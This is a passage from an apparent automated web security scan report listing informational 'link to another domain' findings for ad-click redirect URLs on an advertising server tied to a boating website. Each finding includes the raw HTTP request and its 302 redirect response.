Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:56:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1740615099/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1740615099/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1740615099/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1741696931/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1741696931/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1741696931/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:47:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1744721969/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1744721969/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1744721969/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1748961552/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1748961552/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1748961552/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.279. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1752314789/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1752314789/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1752314789/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1752314789/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1767100923/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1767100923/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1767100923/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/176837699/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/176837699/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/176837699/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.282. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1770472558/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1770472558/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1770472558/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1770472558/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:27:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.283. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1780672365/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1780672365/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1780672365/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1780672365/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790286706/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790286706/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790286706/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:25 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1791372829/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1791372829/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.flashedition.com/publication?i=59172

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1791372829/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.flashedition.com/publication?i=59172
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.flashedition.com/publication?i=59172">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1791697768/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1791697768/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.myonlinepubs.com/publication?i=59161

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1791697768/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.myonlinepubs.com/publication?i=59161
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.myonlinepubs.com/publication?i=59161">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1798360227/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1798360227/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1798360227/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1800046629/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1800046629/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1800046629/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1803110675/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1803110675/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1803110675/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1811274780/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1811274780/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.marinalife.com/soundings

Request

